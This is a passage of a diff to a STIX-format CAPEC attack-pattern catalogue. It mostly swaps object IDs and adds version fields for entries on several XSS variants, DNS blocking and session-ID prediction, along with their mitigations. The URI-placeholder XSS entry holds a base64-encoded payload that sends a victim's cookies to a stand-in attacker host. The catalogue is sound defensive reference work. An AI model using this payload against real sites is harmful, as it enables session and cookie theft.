"2014-06-23T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--26a785cc-ce9d-4dd0-a28e-2da71337c015", - "source_ref": "course-of-action--5b79d919-12d5-443c-9381-126797de730a", + "id": "relationship--926ec109-c4a7-4b3c-937f-9b24ebec9ed7", + "source_ref": "course-of-action--b1a513de-8052-4d43-bfe8-00511def81a1", "relationship_type": "mitigates", - "target_ref": "attack-pattern--a151efbf-6c4c-405a-9aef-71bacdad8a87" + "target_ref": "attack-pattern--be442a79-9548-4668-bb33-e24c51b63e55" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--65e29899-9c06-4a89-9cd9-18e21da8bdb4", - "source_ref": "course-of-action--01ea330a-1b85-4dde-843a-b0d4be2e4d28", + "id": "relationship--3eff23ad-da0e-4d77-b000-c19f0aeaf00f", + "source_ref": "course-of-action--1e44c94e-9c2c-4855-b235-6abd990a40b4", "relationship_type": "mitigates", - "target_ref": "attack-pattern--a151efbf-6c4c-405a-9aef-71bacdad8a87" + "target_ref": "attack-pattern--be442a79-9548-4668-bb33-e24c51b63e55" }, { "name": "XSS Targeting HTML Attributes", "description": "An adversary inserts commands to perform cross-site scripting (XSS) actions in HTML attributes. Many filters do not adequately sanitize attributes against the presence of potentially dangerous commands even if they adequately sanitize tags. For example, dangerous expressions could be inserted into a style attribute in an anchor tag, resulting in the execution of malicious code when the resulting page is rendered. If a victim is tricked into viewing the rendered page the attack proceeds like a normal XSS attack, possibly resulting in the loss of sensitive cookies or other malicious activities.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", @@ -14485,66 +14640,67 @@ ], "x_capec_abstraction": "Detailed", "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--97d0060b-dbc6-438d-a143-f3a1320b3584" + "id": "attack-pattern--f933e0a9-328c-4b49-ad26-c2442a24a3c3" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--ad060471-a3d5-4b78-b911-557c4b6a152c", - "source_ref": "course-of-action--482eb67a-26af-4fd2-9e71-59ff7bea286c", + "id": "relationship--2ec2d107-0a46-4c1a-8a24-39430c2fa965", + "source_ref": "course-of-action--1a69aad1-921e-4766-9425-f61387d1dda1", "relationship_type": "mitigates", - "target_ref": "attack-pattern--97d0060b-dbc6-438d-a143-f3a1320b3584" + "target_ref": "attack-pattern--f933e0a9-328c-4b49-ad26-c2442a24a3c3" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "name": "coa-243-1", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Implementation: Normalize, filter and white list all input including that which is not expected to have any scripting content.", "type": "course-of-action", - "id": "course-of-action--348a811c-5b63-40e3-a7b8-34014098b994" + "id": "course-of-action--061b49b1-f4f3-4237-80b2-fa402ab9054d" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--3238d754-91c8-492c-9779-7146fc24d83d", - "source_ref": "course-of-action--348a811c-5b63-40e3-a7b8-34014098b994", + "id": "relationship--3c30a18d-ff08-4fbc-8b9f-4a270cbcd1f7", + "source_ref": "course-of-action--061b49b1-f4f3-4237-80b2-fa402ab9054d", "relationship_type": "mitigates", - "target_ref": "attack-pattern--97d0060b-dbc6-438d-a143-f3a1320b3584" + "target_ref": "attack-pattern--f933e0a9-328c-4b49-ad26-c2442a24a3c3" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--f1e2c5d7-9d66-48e4-8ea4-85000ecf4f76", - "source_ref": "course-of-action--474c8431-cbe9-414a-b533-15fa606e94d8", + "id": "relationship--42e9c35f-213d-4a90-8635-972c1e112e22", + "source_ref": "course-of-action--bdadfed6-ab7b-490a-bfe9-fa4f27416e89", "relationship_type": "mitigates", - "target_ref": "attack-pattern--97d0060b-dbc6-438d-a143-f3a1320b3584" + "target_ref": "attack-pattern--f933e0a9-328c-4b49-ad26-c2442a24a3c3" }, { "name": "XSS Targeting URI Placeholders", "description": "An attack of this type exploits the ability of most browsers to interpret \"data\", \"javascript\" or other URI schemes as client-side executable content placeholders. This attack consists of passing a malicious URI in an anchor tag HREF attribute or any other similar attributes in other HTML tags. Such malicious URI contains, for example, a base64 encoded HTML content with an embedded cross-site scripting payload. The attack is executed when the browser interprets the malicious content i.e., for example, when the victim clicks on the malicious link.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2014-06-23T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", @@ -14625,131 +14781,132 @@ "\n The following payload data:\n text/html;base64,PGh0bWw+PGJvZHk+PHNjcmlwdD52YXIgaW1nID0gbmV3IEltYWdlKCk7IGltZy5zcmMgPSAiaHR0cDovL2F0dGFja2VyLmNvbS9jb29raWVncmFiYmVyPyIrIGVuY29kZVVSSUNvbXBvbmVudChkb2N1bWVudC5jb29raWVzKTs8L3NjcmlwdD48L2JvZHk+PC9odG1sPg==\n represents a base64 encoded HTML and uses the data URI scheme to deliver it to the browser.\n The decoded payload is the following piece of HTML code:\n \n \n \n Web applications that take user controlled inputs and reflect them in URI HTML placeholder without a proper validation are at risk for such an attack.\n An attacker could inject the previous payload that would be placed in a URI placeholder (for example in the anchor tag HREF attribute):\n My Link\n Once the victim clicks on the link, the browser will decode and execute the content from the payload. This will result on the execution of the cross-site scripting attack.\n " ], "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--263af07a-d9b0-494b-8a5f-3c0d98b247e2" + "id": "attack-pattern--4859301d-e5f0-40d1-b5ed-976929e27e94" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--60540e21-822b-413e-a87e-3d24f3eae760", - "source_ref": "course-of-action--d8c851f4-9464-4d22-b6a5-8e817e3754d1", + "id": "relationship--56822943-78a1-412c-8e7c-789b8788c1f0", + "source_ref": "course-of-action--301e5bbb-d0b4-4c64-93b0-d83f7a317420", "relationship_type": "mitigates", - "target_ref": "attack-pattern--263af07a-d9b0-494b-8a5f-3c0d98b247e2" + "target_ref": "attack-pattern--4859301d-e5f0-40d1-b5ed-976929e27e94" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "name": "coa-244-1", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Design: Utilize strict type, character, and encoding enforcement.", "type": "course-of-action", - "id": "course-of-action--68a08ff6-48aa-4777-bf50-f14702274084" + "id": "course-of-action--ee2910f0-6c14-4cbb-8864-08e53c27a54e" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--c0525a20-fe42-423e-952a-8daa2598c528", - "source_ref": "course-of-action--68a08ff6-48aa-4777-bf50-f14702274084", + "id": "relationship--47087e35-bd4f-46c7-8d01-6312d655f85f", + "source_ref": "course-of-action--ee2910f0-6c14-4cbb-8864-08e53c27a54e", "relationship_type": "mitigates", - "target_ref": "attack-pattern--263af07a-d9b0-494b-8a5f-3c0d98b247e2" + "target_ref": "attack-pattern--4859301d-e5f0-40d1-b5ed-976929e27e94" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--1f062a8f-15d1-4a0f-bb88-c66ab2d494a1", - "source_ref": "course-of-action--f3bd3d55-f25e-4bff-b92b-5a1b421a1975", + "id": "relationship--d2deab8f-48e8-4479-95ee-7dab64bf8abf", + "source_ref": "course-of-action--5ab5bb92-9b0c-4d06-a27f-392c82b316c5", "relationship_type": "mitigates", - "target_ref": "attack-pattern--263af07a-d9b0-494b-8a5f-3c0d98b247e2" + "target_ref": "attack-pattern--4859301d-e5f0-40d1-b5ed-976929e27e94" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--e33351b9-769d-4784-9c0c-906dcd928f1b", - "source_ref": "course-of-action--172c29c6-d4d0-4ef5-8f07-482bd059ed0d", + "id": "relationship--8d474304-906e-403d-ae0f-ae6720b2d8bd", + "source_ref": "course-of-action--5a8152fa-c01e-4c85-b859-5cf3fcd7e926", "relationship_type": "mitigates", - "target_ref": "attack-pattern--263af07a-d9b0-494b-8a5f-3c0d98b247e2" + "target_ref": "attack-pattern--4859301d-e5f0-40d1-b5ed-976929e27e94" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--a4f6f3ae-287a-40df-9535-237714c3e829", - "source_ref": "course-of-action--ae06444d-0bce-4627-9991-906eb216a098", + "id": "relationship--4bfa8d8c-d670-4b99-8b9c-2f08f32e3166", + "source_ref": "course-of-action--c5259bad-3aa0-4826-acb3-eef0dae15daa", "relationship_type": "mitigates", - "target_ref": "attack-pattern--263af07a-d9b0-494b-8a5f-3c0d98b247e2" + "target_ref": "attack-pattern--4859301d-e5f0-40d1-b5ed-976929e27e94" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--63e2c9db-548b-4da1-b3d1-0a7221762596", - "source_ref": "course-of-action--c4397106-6835-4ce6-b6e4-80a636d6f5a8", + "id": "relationship--fec84e5e-c761-451c-8652-d4fd2a29e922", + "source_ref": "course-of-action--116eb05d-d01e-415d-b3d1-7d05b9b2d526", "relationship_type": "mitigates", - "target_ref": "attack-pattern--263af07a-d9b0-494b-8a5f-3c0d98b247e2" + "target_ref": "attack-pattern--4859301d-e5f0-40d1-b5ed-976929e27e94" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--aa217277-ad61-4ebb-a2ca-66e94740040c", - "source_ref": "course-of-action--4bdc152c-7111-4d9d-872a-6c9579ddb87c", + "id": "relationship--d8998cbe-e124-485a-85ca-beca9108afce", + "source_ref": "course-of-action--a78dc251-20b0-40ba-8c69-a48e4dc81eb5", "relationship_type": "mitigates", - "target_ref": "attack-pattern--263af07a-d9b0-494b-8a5f-3c0d98b247e2" + "target_ref": "attack-pattern--4859301d-e5f0-40d1-b5ed-976929e27e94" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--f78b2236-b9c9-4bb5-86dc-47010ad1a974", - "source_ref": "course-of-action--29cc8977-ef47-4c16-a4d2-92483b2e34ec", + "id": "relationship--6e058add-0fcc-4179-8dd4-ae39c312b021", + "source_ref": "course-of-action--fe2064cc-6c8a-4d9b-87e8-5f0491194111", "relationship_type": "mitigates", - "target_ref": "attack-pattern--263af07a-d9b0-494b-8a5f-3c0d98b247e2" + "target_ref": "attack-pattern--4859301d-e5f0-40d1-b5ed-976929e27e94" }, { "name": "XSS Using Doubled Characters", "description": "The attacker bypasses input validation by using doubled characters in order to perform a cross-site scripting attack. Some filters fail to recognize dangerous sequences if they are preceded by repeated characters. For example, by doubling the < before a script command, (<\n In this variation of a DOM-based XSS attack, the malicious script will not be sent to the web server, but will instead be managed by the victim's browser and is still available to the client-side script code.\n " ], "x_capec_status": "Stable", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--ab302f39-09ed-404d-bcac-9711d4cde0af" + "id": "attack-pattern--488fb1b8-b703-42c6-a822-c0960ecff6fd" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2017-04-15T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "name": "coa-588-0", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Use browser technologies that do not allow client-side scripting.", "type": "course-of-action", - "id": "course-of-action--54902baa-e068-4392-9d7a-3cafcf7f9406" + "id": "course-of-action--e87d9d25-d07b-4277-9444-7554d0e36684" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2017-04-15T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--6e855b65-276d-490e-a3f5-a73ef6e8e210", - "source_ref": "course-of-action--54902baa-e068-4392-9d7a-3cafcf7f9406", + "id": "relationship--61e1e477-f922-44ee-b627-9b4c8a43841f", + "source_ref": "course-of-action--e87d9d25-d07b-4277-9444-7554d0e36684", "relationship_type": "mitigates", - "target_ref": "attack-pattern--ab302f39-09ed-404d-bcac-9711d4cde0af" + "target_ref": "attack-pattern--488fb1b8-b703-42c6-a822-c0960ecff6fd" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2017-04-15T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "name": "coa-588-1", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Utilize proper character encoding for all output produced within client-site scripts manipulating the DOM.", "type": "course-of-action", - "id": "course-of-action--fb11c94a-eec1-4a02-91ca-7cc7d307e059" + "id": "course-of-action--093ab972-dc69-4e9d-bafd-38856e65b3d8" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2017-04-15T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--65b089f1-6593-4c2c-82c0-e544b4dd1bdd", - "source_ref": "course-of-action--fb11c94a-eec1-4a02-91ca-7cc7d307e059", + "id": "relationship--17c88c42-12fc-4dfa-ba39-092b1c6c3b2d", + "source_ref": "course-of-action--093ab972-dc69-4e9d-bafd-38856e65b3d8", "relationship_type": "mitigates", - "target_ref": "attack-pattern--ab302f39-09ed-404d-bcac-9711d4cde0af" + "target_ref": "attack-pattern--488fb1b8-b703-42c6-a822-c0960ecff6fd" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2017-04-15T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "name": "coa-588-2", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Ensure that all user-supplied input is validated before use.", "type": "course-of-action", - "id": "course-of-action--7d341729-5128-4d92-b1ed-d2fb7fece46c" + "id": "course-of-action--25de739b-9f9e-4f6f-b5d2-13d8e9e47227" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2017-04-15T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--69a0f821-1761-4b0a-a73f-4df58d420ace", - "source_ref": "course-of-action--7d341729-5128-4d92-b1ed-d2fb7fece46c", + "id": "relationship--fea61934-d6b2-4519-87c4-ec48ad2536e2", + "source_ref": "course-of-action--25de739b-9f9e-4f6f-b5d2-13d8e9e47227", "relationship_type": "mitigates", - "target_ref": "attack-pattern--ab302f39-09ed-404d-bcac-9711d4cde0af" + "target_ref": "attack-pattern--488fb1b8-b703-42c6-a822-c0960ecff6fd" }, { "name": "DNS Blocking", "description": "An adversary intercepts traffic and intentionally drops DNS requests based on content in the request. In this way, the adversary can deny the availability of specific services or content to the user even if the IP address is changed.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2017-01-12T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", @@ -34450,40 +35078,41 @@ "\n Full URL Based Filtering: Filtering based upon the requested URL.\n URL String-based Filtering: Filtering based upon the use of particular strings included in the requested URL.\n " ], "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--79da72cc-c99a-4917-9be2-602e2d9b568e" + "id": "attack-pattern--c8c5d454-e4e2-4c3f-9969-6280319b6d25" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2017-01-12T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "name": "coa-589-0", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "\n Hard Coded Alternate DNS server in applications\n Avoid dependence on DNS\n Include \"hosts file\"/IP address in the application\n Ensure best practices with respect to communications channel protections.\n Use a .onion domain with Tor support\n ", "type": "course-of-action", - "id": "course-of-action--505a89b7-c490-4fb0-bb50-3d78a2bf58ac" + "id": "course-of-action--d4dcaaf9-90cf-4710-8e21-3826cee87167" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2017-01-12T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--88639c55-3cf7-4593-861a-2a0edc61830c", - "source_ref": "course-of-action--505a89b7-c490-4fb0-bb50-3d78a2bf58ac", + "id": "relationship--9c42b260-3a66-4a10-a9f2-92c5bca59e58", + "source_ref": "course-of-action--d4dcaaf9-90cf-4710-8e21-3826cee87167", "relationship_type": "mitigates", - "target_ref": "attack-pattern--79da72cc-c99a-4917-9be2-602e2d9b568e" + "target_ref": "attack-pattern--c8c5d454-e4e2-4c3f-9969-6280319b6d25" }, { "name": "Session Credential Falsification through Prediction", "description": "This attack targets predictable session ID in order to gain privileges. The attacker can predict the session ID used during a transaction to perform spoofing and session hijacking.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2014-06-23T00:00:00.000Z", "modified": "2017-08-04T00:00:00.000Z", @@ -34587,140 +35216,141 @@ "mod_usertrack in Apache 1.3.11 through 1.3.20 generates session ID's using predictable information including host IP address, system time and server process ID, which allows local users to obtain session ID's and bypass authentication when these session ID's are used for authentication. See also: CVE-2001-1534" ], "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--ffefd84c-9e18-4f10-a2ee-0479ced15367" + "id": "attack-pattern--7b38c275-4653-4cef-9a72-cb2d53a1e11e" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-08-04T00:00:00.000Z", "name": "coa-59-0", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Use a strong source of randomness to generate a session ID.", "type": "course-of-action", - "id": "course-of-action--9c19d3e1-7c56-4eeb-a2c5-44852777b08b" + "id": "course-of-action--1d71ce40-c669-47a9-b734-e8a4457d41b7" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-08-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--2d859828-a89d-4270-a20e-276dc8d7b249", - "source_ref": "course-of-action--9c19d3e1-7c56-4eeb-a2c5-44852777b08b", + "id": "relationship--57dab16f-1f71-4c18-831b-30cc259ec6f9", + "source_ref": "course-of-action--1d71ce40-c669-47a9-b734-e8a4457d41b7", "relationship_type": "mitigates", - "target_ref": "attack-pattern--ffefd84c-9e18-4f10-a2ee-0479ced15367" + "target_ref": "attack-pattern--7b38c275-4653-4cef-9a72-cb2d53a1e11e" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-08-04T00:00:00.000Z", "name": "coa-59-1", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Use adequate length session IDs", "type": "course-of-action", - "id": "course-of-action--c067ea7c-cd33-4136-92e3-27f4ecfb1c25" + "id": "course-of-action--b5654dc2-0060-4ab0-9920-0aa60ae7d36a" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-08-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--a1e07d55-6a26-4e5b-ada7-321768b9efb5", - "source_ref": "course-of-action--c067ea7c-cd33-4136-92e3-27f4ecfb1c25", + "id": "relationship--ca2c3223-2a6d-4d2b-9ea0-2990f3112c58", + "source_ref": "course-of-action--b5654dc2-0060-4ab0-9920-0aa60ae7d36a", "relationship_type": "mitigates", - "target_ref": "attack-pattern--ffefd84c-9e18-4f10-a2ee-0479ced15367" + "target_ref": "attack-pattern--7b38c275-4653-4cef-9a72-cb2d53a1e11e" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-08-04T00:00:00.000Z", "name": "coa-59-2", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Do not use information available to the user in order to generate session ID (e.g., time).", "type": "course-of-action", - "id": "course-of-action--3fe1ccab-5a54-4fb6-8f9a-c5fbe15432b7" + "id": "course-of-action--e473da6c-f848-4ec4-bb21-7012b12fb4e9" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-08-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--c4473ec5-52c2-4e6e-b854-9ac32b6f89b4", - "source_ref": "course-of-action--3fe1ccab-5a54-4fb6-8f9a-c5fbe15432b7", + "id": "relationship--10789595-855a-44a4-8fe8-78678c296ed7", + "source_ref": "course-of-action--e473da6c-f848-4ec4-bb21-7012b12fb4e9", "relationship_type": "mitigates", - "target_ref": 